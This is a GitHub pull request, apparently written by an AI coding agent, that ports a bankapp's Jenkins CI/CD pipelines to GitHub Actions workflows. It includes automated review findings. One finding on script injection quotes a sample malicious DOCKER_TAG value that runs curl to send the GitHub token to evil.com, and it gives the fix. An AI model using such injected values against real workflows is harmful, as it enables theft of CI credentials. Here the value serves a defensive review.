Migrate Jenkins CI/CD pipelines to GitHub Actions

[devin-ai-integration]

Migrate Jenkins CI/CD pipelines to GitHub Actions

Summary

Adds two GitHub Actions workflow files that replicate the existing Jenkins CI and CD pipelines. The original Jenkins files (Jenkinsfile, GitOps/Jenkinsfile, vars/*.groovy) are not modified or removed.

CI workflow (ci.yml) maps the 8-stage Jenkins pipeline:

Jenkins Stage	GitHub Actions Equivalent
Workspace cleanup	N/A (fresh runner)
Code Checkout (code_checkout())	actions/checkout@v4
Trivy FS scan (trivy_scan())	aquasecurity/trivy-action@master
OWASP Dependency Check (owasp_dependency())	dependency-check/Dependency-Check_Action@main
SonarQube Analysis (sonarqube_analysis())	sonarsource/sonarqube-scan-action@v6
SonarQube Quality Gate (sonarqube_code_quality())	sonarsource/sonarqube-quality-gate-action@master
Docker Build (docker_build())	docker/build-push-action@v5
Docker Push (docker_push())	Same action with push: true

CD workflow (cd.yml) maps the GitOps Jenkins pipeline: checkout → update K8s manifest via sed → commit & push → email notification. Chained from CI via workflow_call, also triggerable via workflow_dispatch.

Graceful secret handling

SonarQube and Docker Hub steps are guarded with if: ${{ secrets.SECRET != '' }} conditions so they skip gracefully when the corresponding secrets are not yet configured, rather than failing the entire workflow. This allows the pipeline to run partially (checkout, Trivy, OWASP) even before all secrets are set up.

Required Secrets to Configure

Secret	Purpose
DOCKERHUB_USERNAME	Docker Hub username
DOCKERHUB_TOKEN	Docker Hub access token
SONAR_TOKEN	SonarQube authentication token
SONAR_HOST_URL	SonarQube server URL
MAIL_SERVER	SMTP server address
MAIL_PORT	SMTP server port
MAIL_USERNAME	Email sender address
MAIL_PASSWORD	Email sender password
NOTIFICATION_EMAIL	Email recipient address

Review & Testing Checklist for Human

• Docker push on PRs: The build job (which includes Docker image push) runs on pull_request events. This means PR builds will attempt to push images to Docker Hub when secrets are configured. Confirm whether Docker build+push should be gated to push/dispatch events only, or split into separate build-only and push steps.
• CD push permissions: The CD workflow commits and pushes to kubernetes/bankapp-deployment.yml using GITHUB_TOKEN. Verify that branch protection rules allow github-actions[bot] to push, or consider switching to a PAT / bot-branch + PR pattern.
• Email notification has no secret guard: The CD email step (dawidd6/action-send-mail@v3) runs with if: always() but has no guard checking if mail secrets are configured. It will error if MAIL_SERVER/MAIL_USERNAME/MAIL_PASSWORD are not set. Decide whether to add an if guard or accept the failure.
• SonarQube quality gate is non-blocking (continue-on-error: true): This matches the original Jenkins abortPipeline: false behavior. Confirm this is intentional—if you want the gate to block, remove continue-on-error.
• Hardcoded image path: The sed command in CD uses trainwithshubham/bankapp-eks from the original pipeline. Verify this is the correct image reference for this fork.
• Test plan: Configure all required secrets above, then trigger CI via workflow_dispatch with a test DOCKER_TAG value. Verify each step executes and the CD workflow updates the K8s manifest correctly.

Notes

• SonarQube and Docker steps will be skipped (not fail) until their respective secrets are configured
• Original Jenkins files are preserved and can be removed separately once GitHub Actions is validated

---

Link to Devin run: https://app.devin.ai/sessions/cf8756bc6d934ddaad02be9952d78c16
Requested by: @angelalincog

---

[devin-ai-integration]

🤖 Devin AI Engineer

I'll be helping with this pull request! Here's what you should know:

✅ I will automatically:

• Address comments on this PR. Add '(aside)' to your comment to have me ignore it.
• Look at CI failures and help fix them

Note: I can only respond to comments from users who have write access to this repository.

⚙️ Control Options:

• Disable automatic comment and CI monitoring

[devin-ai-integration]

Devin Review found 2 potential issues.

View 4 additional findings in Devin Review.

[devin-ai-integration]

🔴 Docker image name mismatch between CI build and CD deployment

The CI pipeline builds and pushes the Docker image to ${{ secrets.DOCKERHUB_USERNAME }}/bankapp:<tag> (ci.yml:91), but the CD pipeline updates the Kubernetes manifest to reference trainwithshubham/bankapp-eks:<tag> (cd.yml:36). Even if DOCKERHUB_USERNAME is trainwithshubham, the image repository names differ: bankapp vs bankapp-eks. This means the K8s deployment will be updated to reference an image tag that was never pushed to the bankapp-eks repository, causing the deployment to pull a non-existent (or stale) image and likely fail with an ImagePullBackOff error.

Prompt for agents

The CI pipeline pushes the Docker image to the repository named 'bankapp' (ci.yml:91 uses secrets.DOCKERHUB_USERNAME/bankapp:tag), but the CD pipeline's sed command in cd.yml:36 updates the Kubernetes manifest to reference 'trainwithshubham/bankapp-eks:tag'. These are two different Docker image repositories. You need to make the image names consistent. Either change ci.yml line 91 to push to '<username>/bankapp-eks' to match what cd.yml expects, or change cd.yml line 36's sed replacement to use the same '<username>/bankapp' repository that CI pushes to. The Kubernetes deployment manifest (kubernetes/bankapp-deployment.yml:20) currently uses 'trainwithshubham/bankapp-eks:v2', so you would also need to update it if you change the repository name. Also consider using the DOCKERHUB_USERNAME secret in cd.yml instead of the hardcoded 'trainwithshubham' to keep it consistent with ci.yml.

---

Was this helpful? React with 👍 or 👎 to provide feedback.

[devin-ai-integration]

🔴 Script injection vulnerability via unsanitized inputs.DOCKER_TAG in shell commands

Multiple run: steps directly interpolate ${{ inputs.DOCKER_TAG }} (and ${{ github.event.inputs.DOCKER_TAG }}) into shell commands. Since workflow_dispatch allows users to supply arbitrary string input for DOCKER_TAG, a malicious value like v1"; curl http://evil.com/steal?t=$(cat $GITHUB_TOKEN); echo " could execute arbitrary commands. This affects ci.yml:31-32, cd.yml:32, cd.yml:36, and cd.yml:47. The safe pattern is to assign the expression to an environment variable first and reference it as $DOCKER_TAG in the shell.

Example of safe pattern

env:
  DOCKER_TAG: ${{ inputs.DOCKER_TAG }}
run: |
  echo "DOCKER TAG RECEIVED - $DOCKER_TAG"

Prompt for agents

In cd.yml, lines 32, 36, and 47 all directly interpolate ${{ inputs.DOCKER_TAG }} into shell run commands. This is a GitHub Actions script injection vulnerability because the DOCKER_TAG input can contain arbitrary characters when triggered via workflow_dispatch. The fix is to assign the input to an environment variable in each step (using env: DOCKER_TAG: ${{ inputs.DOCKER_TAG }}) and then reference it as $DOCKER_TAG in the shell script. The same issue exists in ci.yml lines 31-32 with ${{ github.event.inputs.DOCKER_TAG }}. All four occurrences across both files need to be fixed.

---

Was this helpful? React with 👍 or 👎 to provide feedback.

[devin-ai-integration]

❌ Cannot revive Devin session - the session is too old. Please start a new session instead.